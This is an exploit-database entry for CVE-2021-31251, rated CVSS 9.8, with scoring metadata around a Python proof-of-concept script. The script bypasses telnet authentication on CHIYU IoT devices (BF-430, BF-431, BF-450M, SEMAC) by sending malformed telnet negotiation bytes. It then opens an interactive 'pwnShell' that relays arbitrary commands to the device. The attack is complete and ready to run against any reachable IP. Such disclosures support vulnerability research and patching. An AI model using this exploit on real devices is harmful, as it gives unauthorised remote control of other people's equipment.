Lucene search

K
zdtSirpedrotavares1337DAY-ID-36338
HistoryJun 03, 2021 - 12:00 a.m.

CHIYU IoT Devices - (Telnet) Authentication Bypass Exploit

2021-06-0300:00:00
sirpedrotavares
0day.today
39

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

0.033 Low

EPSS

Percentile

91.0%

# Exploit Title: CHIYU IoT Devices - 'Telnet' Authentication Bypass
# Exploit Author: sirpedrotavares
# Vendor Homepage: https://www.chiyu-tech.com/msg/msg88.html
# Software Link: https://www.chiyu-tech.com/category-hardware.html
# Version:  BF-430, BF-431, BF-450M, and SEMAC   - all firmware versions < June 2021
# Tested on:  BF-430, BF-431, BF-450M, and SEMAC
# CVE: CVE-2021-31251
# Publication: https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks

"""
Description: Several IoT devices from the CHIYU Technology firm are
vulnerable to a flaw that permits bypassing the telnet authentication
process due to an overflow during the negotiation of the telnet protocol.
Telnet authentication is bypassed by supplying a specially malformed
request, and an attacker may force the remote telnet server to believe that
the user has already authenticated. Several models are vulnerable,
including BF-430, BF-431, BF-450M, and SEMAC with the most recent firmware
versions.
CVE ID: CVE-2021-31251
CVSS: Critical - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31251
"""

#!/usr/bin/env python3

# usage: python3 exploit.py IP

import socket
import time
import sys

HOST = sys.argv[1]
PORT = 23

socket.setdefaulttimeout(10)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
    connect = s.connect_ex((HOST, PORT))
    try:
        print("[+] Try to connect...\n")
        time.sleep(1)
        s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18")
        s.recv(1024).strip()
        s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18")
        s.recv(1024).strip()
        s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18")
        result = s.recv(1024).strip()
        if result != b'\xff\xfe\x01':
            s.send(b"\x09")
            result = s.recv(1024).strip()

        if connect == 0 and "sername" not in str(result):
            if b"\xff\xfe\x01" == result:
                print("Connected! ;)\ntype: \"help\"\n\n")
                while 1:
                        cmd = input("(CHIYU pwnShell:) $ ")
                        body = cmd+"\n"
                        s.send(body.encode('utf-8', 'ignore'))
                        result = s.recv(1024).decode('utf8', 'ignore')

                        if not len(result):
                            print("[+] CHIYU device not available, try
again ... (terminating)")
                            s.close()
                            break
                        print(result.strip('CMD>'))
                        b = "\n"
                        s.send(b.encode('utf-8', 'ignore'))
                        result = s.recv(1024).decode()
                        print(result.strip('CMD>'))
    except KeyboardInterrupt:
        print("\n[+] ^C Received, closing connection")
        s.close()
    except EOFError:
        print("\n[+] ^D Received, closing connection")
        s.close()

except socket.error:
    print("[+] Unable to connect to CHIYU device.")

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

0.033 Low

EPSS

Percentile

91.0%

Related for 1337DAY-ID-36338